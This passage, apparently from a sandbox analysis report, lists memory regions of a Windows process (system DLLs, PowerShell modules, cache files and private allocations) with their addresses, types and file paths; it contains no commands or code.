	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 577
	        start_va = 0x184b800000
	          end_va = 0x184c18ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184b800000"
	        filename = ""

Region:
	              id = 578
	        start_va = 0x7ffc10810000
	          end_va = 0x7ffc108a5fff
	     entry_point = 0x7ffc10810000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 579
	        start_va = 0x1505f4b0000
	          end_va = 0x1505f58ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001505f4b0000"
	        filename = ""

Region:
	              id = 580
	        start_va = 0x1505fcb0000
	          end_va = 0x1505fd8cfff
	     entry_point = 0x1505fcb0000
	     region_type = mapped_file
	            name = "rpcss.dll"
	        filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")

Region:
	              id = 581
	        start_va = 0x184c190000
	          end_va = 0x184c20ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184c190000"
	        filename = ""

Region:
	              id = 582
	        start_va = 0x184c210000
	          end_va = 0x184c28ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184c210000"
	        filename = ""

Region:
	              id = 583
	        start_va = 0x184c290000
	          end_va = 0x184c30ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184c290000"
	        filename = ""

Region:
	              id = 584
	        start_va = 0x7ffc0b3d0000
	          end_va = 0x7ffc0b3dffff
	     entry_point = 0x7ffc0b3d0000
	     region_type = mapped_file
	            name = "amsi.dll"
	        filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll")

Region:
	              id = 585
	        start_va = 0x15045730000
	          end_va = 0x15045730fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015045730000"
	        filename = ""

Region:
	              id = 586
	        start_va = 0x7ffc12a30000
	          end_va = 0x7ffc12ad6fff
	     entry_point = 0x7ffc12a30000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 587
	        start_va = 0x15046fa0000
	          end_va = 0x15046fa0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015046fa0000"
	        filename = ""

Region:
	              id = 588
	        start_va = 0x15046fb0000
	          end_va = 0x15046fddfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015046fb0000"
	        filename = ""

Region:
	              id = 589
	        start_va = 0x184b190000
	          end_va = 0x184b1cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184b190000"
	        filename = ""

Region:
	              id = 590
	        start_va = 0x184c310000
	          end_va = 0x184c38ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184c310000"
	        filename = ""

Region:
	              id = 591
	        start_va = 0x7ffb98da0000
	          end_va = 0x7ffb98daffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98da0000"
	        filename = ""

Region:
	              id = 592
	        start_va = 0x7ffb98db0000
	          end_va = 0x7ffb98dbffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98db0000"
	        filename = ""

Region:
	              id = 593
	        start_va = 0x7ffbf9320000
	          end_va = 0x7ffbf9344fff
	     entry_point = 0x7ffbf9320000
	     region_type = mapped_file
	            name = "smdiagnostics.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\SMDiagnostics\\3aa7da61075c3a19976503e08685ea9c\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\smdiagnostics\\3aa7da61075c3a19976503e08685ea9c\\smdiagnostics.ni.dll")

Region:
	              id = 594
	        start_va = 0x7ffbf9350000
	          end_va = 0x7ffbf9680fff
	     entry_point = 0x7ffbf9350000
	     region_type = mapped_file
	            name = "system.runtime.serialization.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Runteb92aa12#\\340cf313b8da7e43376ee98292cc61e7\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.runteb92aa12#\\340cf313b8da7e43376ee98292cc61e7\\system.runtime.serialization.ni.dll")

Region:
	              id = 595
	        start_va = 0x7ffbf9220000
	          end_va = 0x7ffbf9311fff
	     entry_point = 0x7ffbf9220000
	     region_type = mapped_file
	            name = "system.servicemodel.internals.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Servd1dec626#\\d9557b4b0aa51aa795c37cc322226be5\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.servd1dec626#\\d9557b4b0aa51aa795c37cc322226be5\\system.servicemodel.internals.ni.dll")

Region:
	              id = 596
	        start_va = 0x184c390000
	          end_va = 0x184c3cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184c390000"
	        filename = ""

Region:
	              id = 597
	        start_va = 0x184c3d0000
	          end_va = 0x184c44ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184c3d0000"
	        filename = ""

Region:
	              id = 598
	        start_va = 0x15046fe0000
	          end_va = 0x15046fe0fff
	     entry_point = 0x15046fe0000
	     region_type = mapped_file
	            name = "microsoft.powershell.utility.psd1"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")

Region:
	              id = 599
	        start_va = 0x7ffb98dc0000
	          end_va = 0x7ffb98dcffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98dc0000"
	        filename = ""

Region:
	              id = 600
	        start_va = 0x15046fe0000
	          end_va = 0x15047007fff
	     entry_point = 0x15046fe0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 601
	        start_va = 0x1505fcb0000
	          end_va = 0x1505fdaffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001505fcb0000"
	        filename = ""

Region:
	              id = 602
	        start_va = 0x7ffbf1840000
	          end_va = 0x7ffbf1b8cfff
	     entry_point = 0x7ffbf1840000
	     region_type = mapped_file
	            name = "system.data.dll"
	        filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll")

Region:
	              id = 603
	        start_va = 0x7ffbf1b90000
	          end_va = 0x7ffbf2499fff
	     entry_point = 0x7ffbf1b90000
	     region_type = mapped_file
	            name = "system.data.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\9be0116d0c465b75b11a42413573047c\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.data\\9be0116d0c465b75b11a42413573047c\\system.data.ni.dll")

Region:
	              id = 604
	        start_va = 0x7ffc14b40000
	          end_va = 0x7ffc14baafff
	     entry_point = 0x7ffc14b40000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 605
	        start_va = 0x15046fe0000
	          end_va = 0x15046fe0fff
	     entry_point = 0x15046fe0000
	     region_type = mapped_file
	            name = "microsoft.powershell.utility.psd1"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")

Region:
	              id = 606
	        start_va = 0x7ffb98dd0000
	          end_va = 0x7ffb98ddffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98dd0000"
	        filename = ""

Region:
	              id = 607
	        start_va = 0x15046fe0000
	          end_va = 0x15047007fff
	     entry_point = 0x15046fe0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 608
	        start_va = 0x15046fe0000
	          end_va = 0x15046fe5fff
	     entry_point = 0x15046fe0000
	     region_type = mapped_file
	            name = "microsoft.powershell.utility.psm1"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")

Region:
	              id = 609
	        start_va = 0x7ffbf0b50000
	          end_va = 0x7ffbf1835fff
	     entry_point = 0x7ffbf0b50000
	     region_type = mapped_file
	            name = "microsoft.powershell.commands.utility.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\88a975931d03d5c3848280ed0b4cee0d\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p521220ea#\\88a975931d03d5c3848280ed0b4cee0d\\microsoft.powershell.commands.utility.ni.dll")

Region:
	              id = 610
	        start_va = 0x15046fe0000
	          end_va = 0x15047007fff
	     entry_point = 0x15046fe0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 611
	        start_va = 0x15046fe0000
	          end_va = 0x15046fe5fff
	     entry_point = 0x15046fe0000
	     region_type = mapped_file
	            name = "microsoft.powershell.utility.psm1"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")

Region:
	              id = 612
	        start_va = 0x7ffb98de0000
	          end_va = 0x7ffb98deffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98de0000"
	        filename = ""

Region:
	              id = 613
	        start_va = 0x7ffb98df0000
	          end_va = 0x7ffb98dfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98df0000"
	        filename = ""

Region:
	              id = 614
	        start_va = 0x7ffb98e00000
	          end_va = 0x7ffb98e0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98e00000"
	        filename = ""

Region:
	              id = 615
	        start_va = 0x7ffb98e10000
	          end_va = 0x7ffb98e1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98e10000"
	        filename = ""

Region:
	              id = 616
	        start_va = 0x15046fe0000
	          end_va = 0x15047007fff
	     entry_point = 0x15046fe0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 617
	        start_va = 0x15046fe0000
	          end_va = 0x15046feffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015046fe0000"
	        filename = ""

Region:
	              id = 618
	        start_va = 0x15046ff0000
	          end_va = 0x15046ffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015046ff0000"
	        filename = ""

Region:
	              id = 619
	        start_va = 0x7ffc11ae0000
	          end_va = 0x7ffc11b78fff
	     entry_point = 0x7ffc11ae0000
	     region_type = mapped_file
	            name = "sxs.dll"
	        filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")

Region:
	              id = 620
	        start_va = 0x1505fdb0000
	          end_va = 0x1505fe8ffff
	     entry_point = 0x1505fdb0000
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")

Region:
	              id = 621
	        start_va = 0x7ffbf8f50000
	          end_va = 0x7ffbf918efff
	     entry_point = 0x7ffbf8f50000
	     region_type = mapped_file
	            name = "msxml3.dll"
	        filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")

Region:
	              id = 622
	        start_va = 0x1505fe90000
	          end_va = 0x1506000ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001505fe90000"
	        filename = ""

Region:
	              id = 623
	        start_va = 0x15060010000
	          end_va = 0x150601cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015060010000"
	        filename = ""

Region:
	              id = 624
	        start_va = 0x15046fe0000
	          end_va = 0x15046ffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015046fe0000"
	        filename = ""

Region:
	              id = 625
	        start_va = 0x15047000000
	          end_va = 0x1504702ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015047000000"
	        filename = ""

Region:
	              id = 626
	        start_va = 0x15047000000
	          end_va = 0x1504701ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015047000000"
	        filename = ""

Region:
	              id = 627
	        start_va = 0x15047020000
	          end_va = 0x1504702ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015047020000"
	        filename = ""

Region:
	              id = 628
	        start_va = 0x150601d0000
	          end_va = 0x150603bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000150601d0000"
	        filename = ""

Region:
	              id = 629
	        start_va = 0x1505f4b0000
	          end_va = 0x1505f4effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001505f4b0000"
	        filename = ""

Region:
	              id = 630
	        start_va = 0x1505f580000
	          end_va = 0x1505f58ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001505f580000"
	        filename = ""

Region:
	              id = 631
	        start_va = 0x150603c0000
	          end_va = 0x150607bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000150603c0000"
	        filename = ""

Region:
	              id = 632
	        start_va = 0x15046fe0000
	          end_va = 0x15046fe0fff
	     entry_point = 0x15046fe0000
	     region_type = mapped_file
	            name = "msxml3r.dll"
	        filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")

Region:
	              id = 633
	        start_va = 0x15046ff0000
	          end_va = 0x15046ffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015046ff0000"
	        filename = ""

Region:
	              id = 634
	        start_va = 0x7ffbf0a10000
	          end_va = 0x7ffbf0b46fff
	     entry_point = 0x7ffbf0a10000
	     region_type = mapped_file
	            name = "msado15.dll"
	        filename = "\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll")

Region:
	              id = 635
	        start_va = 0x7ffbf09e0000
	          end_va = 0x7ffbf0a04fff
	     entry_point = 0x7ffbf09e0000
	     region_type = mapped_file
	            name = "msdart.dll"
	        filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll")

Region:
	              id = 636
	        start_va = 0x15047030000
	          end_va = 0x1504704ffff
	     entry_point = 0x15047030000
	     region_type = mapped_file
	            name = "msxml3.dll"
	        filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")

Region:
	              id = 637
	        start_va = 0x15047000000
	          end_va = 0x15047004fff
	     entry_point = 0x15047000000
	     region_type = mapped_file
	            name = "stdole2.tlb"
	        filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")

Region:
	              id = 638
	        start_va = 0x15047010000
	          end_va = 0x1504701ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015047010000"
	        filename = ""

Region:
	              id = 639
	        start_va = 0x15047050000
	          end_va = 0x15047056fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015047050000"
	        filename = ""

Region:
	              id = 640
	        start_va = 0x7ffc071a0000
	          end_va = 0x7ffc07357fff
	     entry_point = 0x7ffc071a0000
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")

Region:
	              id = 641
	        start_va = 0x7ffc0bc60000
	          end_va = 0x7ffc0bfe1fff
	     entry_point = 0x7ffc0bc60000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")

Region:
	              id = 642
	        start_va = 0x7ffc06f10000
	          end_va = 0x7ffc0719dfff
	     entry_point = 0x7ffc06f10000
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")

Region:
	              id = 643
	        start_va = 0x7ffc00190000
	          end_va = 0x7ffc001cdfff
	     entry_point = 0x7ffc00190000
	     region_type = mapped_file
	            name = "mlang.dll"
	        filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll")

Region:
	              id = 644
	        start_va = 0x7ffc12ae0000
	          end_va = 0x7ffc12c39fff
	     entry_point = 0x7ffc12ae0000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 645
	        start_va = 0x1505f4b0000
	          end_va = 0x1505f4b0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001505f4b0000"
	        filename = ""

Region:
	              id = 646
	        start_va = 0x1505f4e0000
	          end_va = 0x1505f4effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001505f4e0000"
	        filename = ""

Region:
	              id = 647
	        start_va = 0x1505fe90000
	          end_va = 0x1505ff4bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001505fe90000"
	        filename = ""

Region:
	              id = 648
	        start_va = 0x15060000000
	          end_va = 0x1506000ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015060000000"
	        filename = ""

Region:
	              id = 649
	        start_va = 0x1505f4b0000
	          end_va = 0x1505f4b3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001505f4b0000"
	        filename = ""

Region:
	              id = 650
	        start_va = 0x7ffc0fcd0000
	          end_va = 0x7ffc0fcf1fff
	     entry_point = 0x7ffc0fcd0000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 651
	        start_va = 0x1505f4c0000
	          end_va = 0x1505f4c0fff
	     entry_point = 0x1505f4c0000
	     region_type = mapped_file
	            name = "counters.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat")

Region:
	              id = 652
	        start_va = 0x7ffc096a0000
	          end_va = 0x7ffc096b4fff
	     entry_point = 0x7ffc096a0000
	     region_type = mapped_file
	            name = "ondemandconnroutehelper.dll"
	        filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")

Region:
	              id = 653
	        start_va = 0x7ffc0ad00000
	          end_va = 0x7ffc0ad37fff
	     entry_point = 0x7ffc0ad00000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")

Region:
	              id = 654
	        start_va = 0x7ffc0d810000
	          end_va = 0x7ffc0d8d7fff
	     entry_point = 0x7ffc0d810000
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")

Region:
	              id = 655
	        start_va = 0x1505f4d0000
	          end_va = 0x1505f4d0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001505f4d0000"
	        filename = ""

Region:
	              id = 656
	        start_va = 0x7ffc153f0000
	          end_va = 0x7ffc153f7fff
	     entry_point = 0x7ffc153f0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")

Region:
	              id = 657
	        start_va = 0x7ffc11520000
	          end_va = 0x7ffc1157bfff
	     entry_point = 0x7ffc11520000
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")

Region:
	              id = 658
	        start_va = 0x7ffc0aad0000
	          end_va = 0x7ffc0aadafff
	     entry_point = 0x7ffc0aad0000
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")

Region:
	              id = 659
	        start_va = 0x7ffc10740000
	          end_va = 0x7ffc107e9fff
	     entry_point = 0x7ffc10740000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")

Region:
	              id = 815
	        start_va = 0x184c450000
	          end_va = 0x184c4cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184c450000"
	        filename = ""

Region:
	              id = 816
	        start_va = 0x1505f4f0000
	          end_va = 0x1505f4fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001505f4f0000"
	        filename = ""

Region:
	              id = 817
	        start_va = 0x7ffc09610000
	          end_va = 0x7ffc09619fff
	     entry_point = 0x7ffc09610000
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")

Region:
	              id = 818
	        start_va = 0x7ffc0a960000
	          end_va = 0x7ffc0a9c6fff
	     entry_point = 0x7ffc0a960000
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")

Region:
	              id = 819
	        start_va = 0x15060010000
	          end_va = 0x1506010ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015060010000"
	        filename = ""

Region:
	              id = 820
	        start_va = 0x150601c0000
	          end_va = 0x150601cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000150601c0000"
	        filename = ""

Region:
	              id = 821
	        start_va = 0x1505f500000
	          end_va = 0x1505f51ffff
	     entry_point = 0x1505f500000
	     region_type = mapped_file
	            name = "msado15.dll"
	        filename = "\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll")

Region:
	              id = 822
	        start_va = 0x150607c0000
	          end_va = 0x15060bbffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000150607c0000"
	        filename = ""

Region:
	              id = 823
	        start_va = 0x7ffb98e20000
	          end_va = 0x7ffb98e2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98e20000"
	        filename = ""

Region:
	              id = 824
	        start_va = 0x184c4d0000
	          end_va = 0x184c50ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184c4d0000"
	        filename = ""

Region:
	              id = 825
	        start_va = 0x7ffbf0270000
	          end_va = 0x7ffbf042ffff
	     entry_point = 0x7ffbf0270000
	     region_type = mapped_file
	            name = "microsoft.powershell.commands.management.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\1adfd61d1b3e39eb7196e5c4f4b88fb1\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pae3498d9#\\1adfd61d1b3e39eb7196e5c4f4b88fb1\\microsoft.powershell.commands.management.ni.dll")

Region:
	              id = 826
	        start_va = 0x7ffc101d0000
	          end_va = 0x7ffc10355fff
	     entry_point = 0x7ffc101d0000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 827
	        start_va = 0x1505f520000
	          end_va = 0x1505f523fff
	     entry_point = 0x1505f520000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 828
	        start_va = 0x1505f530000
	          end_va = 0x1505f574fff
	     entry_point = 0x1505f530000
	     region_type = mapped_file
	            name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db")

Region:
	              id = 829
	        start_va = 0x1505f590000
	          end_va = 0x1505f593fff
	     entry_point = 0x1505f590000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 830
	        start_va = 0x1505ff50000
	          end_va = 0x1505ffddfff
	     entry_point = 0x1505ff50000
	     region_type = mapped_file
	            name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")

Region:
	              id = 831
	        start_va = 0x1505ffe0000
	          end_va = 0x1505ffe3fff
	     entry_point = 0x1505ffe0000
	     region_type = mapped_file
	            name = "cversions.1.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")

Region:
	              id = 832
	        start_va = 0x15060110000
	          end_va = 0x15060123fff
	     entry_point = 0x15060110000
	     region_type = mapped_file
	            name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000027.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000027.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000027.db")

Region:
	              id = 833
	        start_va = 0x1505fff0000
